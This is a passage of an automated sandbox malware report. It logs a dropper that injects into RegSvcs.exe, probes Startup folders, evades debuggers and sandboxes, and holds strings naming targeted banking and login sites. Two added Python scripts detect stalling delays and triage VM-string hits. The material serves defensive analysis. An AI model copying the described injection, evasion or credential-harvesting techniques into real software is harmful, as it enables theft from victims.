                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596023Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595899Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598971Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Thread delayed: delay time values, in order: 598859, 598603, 598342, 598203, 598078, 597969, 597844, 597734, 597625, 597516, 597406, 597297, 597187, 597078, 596968, 596859, 596750, 596640, 596531, 596421, 596310, 596203, 596094, 595984, 595875, 595765, 595656, 595547, 595437, 595328, 595219, 595094, 594981, 594873, 594765, 594656, 594547, 594437, 594328, 594219, 594109, 594000
Source: C:\Windows\System32\wscript.exe - Window found: window name: WSH-Timer
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Window / User API: threadDelayed 2489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Window / User API: threadDelayed 7350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Window / User API: threadDelayed 6890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Window / User API: threadDelayed 2925
Source: C:\Users\user\Desktop\RubzLi27lr.exe - API coverage: 3.7 %
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - API coverage: 4.0 %
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B1DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AEC2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B268EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B2698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B1D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B1D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B29642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B2979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B29B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B25C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0091C2A2 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_009568EE FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_00955C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Thread delayed: delay time values, in order: 922337203685477, 600000, 599890, 599781, 599671, 599562, 599453, 599343, 599228, 599123, 599015, 598886, 598770, 598640, 598479, 598372, 598265, 598156, 598047, 597937, 597828, 597719, 597609, 597500, 597390, 597281, 597172, 597062, 596953, 596843, 596734, 596624, 596515, 596406, 596296, 596140, 596023, 595899, 595797, 595687, 595578, 595468, 595359, 595250, 595140, 595031, 594922, 594812, 594702, 594593, 594484, 594375, 594265, 594156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Thread delayed: delay time values, in order: 922337203685477, 600000, 599875, 599765, 599656, 599547, 599437, 599328, 599219, 599094, 598971, 598859, 598603, 598342, 598203, 598078, 597969, 597844, 597734, 597625, 597516, 597406, 597297, 597187, 597078, 596968, 596859, 596750, 596640, 596531, 596421, 596310, 596203, 596094, 595984, 595875, 595765, 595656, 595547, 595437, 595328, 595219, 595094, 594981, 594873, 594765, 594656, 594547, 594437, 594328, 594219, 594109, 594000
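The RegSvcs.exe delay lists above are worth reading as a shape rather than as individual numbers: each run starts with 922337203685477, then 600000, then values that shrink by roughly 110 per observation. 922337203685477 is Int64.MaxValue ticks of 100 ns expressed in whole milliseconds, i.e. TimeSpan.MaxValue, so that entry is a .NET wait with no finite timeout; the countdown from 600000 is what a loop that sleeps for "deadline minus now" and re-enters the sleep after every wake-up produces. The script below is an added example, not code from the report or from Joe Sandbox; it parses behaviour lines in either the original fused form or the cleaned "Source: ... - ..." form, and it assumes the delay values are milliseconds (the unit Sleep and .NET timeouts take). Thresholds, the sample lines and the Window-found line are constructed for the example.

```python
import re
from dataclasses import dataclass

# Matches the report's observation text whether or not extraction fused it to
# the process path ("...RegSvcs.exeThread delayed: delay time: 600000").
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")

# TimeSpan.MaxValue in whole milliseconds: Int64.MaxValue ticks of 100 ns each.
# The report's 922337203685477 is exactly this value, which points at a .NET
# wait that was handed TimeSpan.MaxValue rather than a finite timeout.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477
# Largest delay Win32 Sleep()/.NET Thread.Sleep(int) can express.
MAX_INT32_MS = 2**31 - 1


@dataclass
class DelayProfile:
    count: int               # number of delay observations
    total_ms: int            # sum of the finite delays
    max_finite_ms: int       # longest single finite delay
    infinite_waits: int      # delays too large for Sleep(int): "wait forever" timeouts
    longest_countdown: int   # length of the longest run of steadily shrinking delays
    countdown_span: tuple    # (first, last) value of that run


def parse_delays(lines):
    """Extract every 'delay time' value from Joe Sandbox behaviour lines."""
    return [int(m.group(1)) for line in lines if (m := DELAY_RE.search(line))]


def longest_countdown(delays, min_step=50, max_step=500):
    """Longest run in which each delay is smaller than the previous one by a
    small step. That shape comes from a loop that sleeps for 'deadline - now'
    and re-enters the sleep after every wake-up (timer, window message, hook),
    so every observation is the remaining time, ~100 ms less than the last."""
    if not delays:
        return 0, (None, None)
    best_len, best_span, run_start = 1, (delays[0], delays[0]), 0
    for i in range(1, len(delays)):
        if not (min_step <= delays[i - 1] - delays[i] <= max_step):
            run_start = i                       # step too big, zero or negative: new run
        run_len = i - run_start + 1
        if run_len > best_len:
            best_len, best_span = run_len, (delays[run_start], delays[i])
    return best_len, best_span


def profile(delays):
    finite = [d for d in delays if d <= MAX_INT32_MS]
    run_len, span = longest_countdown(delays)
    return DelayProfile(len(delays), sum(finite), max(finite, default=0),
                        len(delays) - len(finite), run_len, span)


def is_sandbox_evasion(p, min_total_ms=5 * 60_000, min_countdown=10):
    """Heuristic verdict: minutes of requested idle time, or a deadline
    countdown, means the process is trying to outlast the analysis window.
    Infinite waits are reported but not counted: blocking forever on a handle
    is normal for .NET worker threads."""
    return p.total_ms >= min_total_ms or p.longest_countdown >= min_countdown


# Constructed sample: the first values of one RegSvcs.exe run from this report
# plus one unrelated observation, in the cleaned 'Source: ... - ...' form.
_VALUES = [922337203685477, 600000, 599890, 599781, 599671, 599562,
           599453, 599343, 599228, 599123, 599015]
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\wscript.exe - Window found: window name: WSH-Timer",
] + [
    rf"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Thread delayed: delay time: {v}"
    for v in _VALUES
]

if __name__ == "__main__":
    p = profile(parse_delays(SAMPLE_LINES))
    print(p)
    print("total requested idle time: %.1f min" % (p.total_ms / 60_000))
    print("sandbox evasion:", is_sandbox_evasion(p))
```

On the eleven sample values the profile already reports about 100 minutes of requested idle time and a ten-step countdown; the full runs in the report each carry over fifty steps, so the thresholds are generous. The countdown detector is the more robust of the two checks: a stalling loop that picks random sleep lengths defeats the total, but one that waits for a fixed deadline always leaves this monotone trace.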
Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: discord.comVMware20,11696487552f
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: global block list test formVMware20,11696487552
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: AMC password management pageVMware20,11696487552
Source: RegSvcs.exe, 00000003.00000002.3369425825.0000000000E20000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: dev.azure.comVMware20,11696487552j
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: RegSvcs.exe, 00000009.00000002.3369147970.000000000121A000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllna
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
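Almost every "VMware" hit in the RegSvcs.exe memory dumps above is a site origin (secure.bankofamerica.com, outlook.office365.com) or a page title (Canara Transaction Password, AMC password management page) with the same token, VMware20,11696487552, glued to its end; the two exceptions are the "Hyper-V RAW" Winsock provider string from mswsock.dll. Those records read like entries from a browser's saved-login store, which fits the "Tries to harvest and steal browser information" signature at the top of the report; that attribution is my inference from the string contents, not something the report states, and so is the note that the Hyper-V RAW catalog entry ships with current Windows 10/11 builds whether or not the machine is virtualised. The script below is an added example, not code from the report or Joe Sandbox: it finds the one token shared by most hits, strips it, classifies what remains, and leaves only the hits that still look like hypervisor fingerprinting. The sample strings are copied from the dumps above, with one constructed genuine VMware indicator added to show that path.

```python
import math
import re
from collections import Counter
from dataclasses import dataclass

# A bare site origin: host name, optional path, nothing else.
ORIGIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/\S*)?$", re.I)

# Winsock catalog entries that name a hypervisor but are part of every current
# Windows 10/11 install: the Hyper-V socket provider registered by mswsock.dll.
STOCK_WINSOCK = ("Hyper-V RAW",)


@dataclass
class Hit:
    raw: str
    kind: str       # saved-login origin | saved-login title | stock winsock entry | unexplained
    record: str     # the string with the shared token / provider path stripped


def shared_vm_token(strings, min_fraction=0.5):
    """Longest 'VMware...' prefix that ends at least min_fraction of the hits.
    If one identical token is glued to half of the strings, the scanner matched
    that token, not anything inside each record itself."""
    tails = [s[s.index("VMware"):] for s in strings if "VMware" in s]
    need = max(2, math.ceil(min_fraction * len(strings)))
    best = ""
    for t in tails:
        for length in range(len(t), len("VMware"), -1):
            cand = t[:length]
            if len(cand) <= len(best):
                break                      # cannot beat the current best from here
            if sum(u.startswith(cand) for u in tails) >= need:
                best = cand
                break
    return best or None


def triage(strings):
    token = shared_vm_token(strings)
    hits = []
    for s in strings:
        if token and token in s:
            record = s[:s.index(token)]    # drops the token and the junk bytes after it
            kind = "saved-login origin" if ORIGIN_RE.match(record) else "saved-login title"
        elif s.startswith(STOCK_WINSOCK) and "mswsock.dll" in s:
            record, kind = s.split("%")[0], "stock winsock entry"
        else:
            record, kind = s, "unexplained"
        hits.append(Hit(s, kind, record))
    return token, hits


def kind_counts(strings):
    return dict(Counter(h.kind for h in triage(strings)[1]))


def unexplained(strings):
    """The hits that still deserve a look as real hypervisor fingerprinting."""
    return [h.raw for h in triage(strings)[1] if h.kind == "unexplained"]


# Constructed sample: nine strings copied from the report's RegSvcs.exe memory
# dumps plus one constructed genuine VM fingerprint (the SMBIOS product name a
# VMware guest reports) so the unexplained path is exercised.
SAMPLE_HITS = [
    "Interactive Brokers - EU East & CentralVMware20,11696487552",
    "secure.bankofamerica.comVMware20,11696487552|UE",
    "account.microsoft.com/profileVMware20,11696487552u",
    "discord.comVMware20,11696487552f",
    "Canara Change Transaction PasswordVMware20,11696487552",
    r"Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    "outlook.office365.comVMware20,11696487552t",
    "Test URL for global passwords blocklistVMware20,11696487552",
    r"Hyper-V RAW%SystemRoot%\system32\mswsock.dllna",
    "VMware Virtual Platform",
]

if __name__ == "__main__":
    token, hits = triage(SAMPLE_HITS)
    print("shared token:", token)
    for h in hits:
        print(f"{h.kind:<22} {h.record}")
    print("counts:", kind_counts(SAMPLE_HITS))
    print("still unexplained:", unexplained(SAMPLE_HITS))
```

The point of the shared-token step is that a substring scanner cannot tell "VMware" inside data the malware collected from a VM-hosted victim apart from "VMware" in a string the malware carries to recognise a VM. Only the second is an evasion capability; the first is evidence of the theft the other signatures already describe, and the stripped records (the origins and titles) are what an incident responder wants listed as targeted sites.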
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 3_2_064F9548 LdrInitializeThunk
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B2EAA2 BlockInput
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AD4CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_0180EFD8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_0180EF78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_0180D928 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_00904CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0139F518 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0139F4B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0139DE68 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 8_2_017BEFE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 8_2_017BF048 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 8_2_017BD998 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00B10B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AD083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AD09D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\RubzLi27lr.exe - Code function: 0_2_00AD0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_0090083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_009009D5 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe - Code function: 2_2_00900C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 85B008
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E38008
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B11201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AF2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B1B226 SendInput,keybd_event
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B322DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RubzLi27lr.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
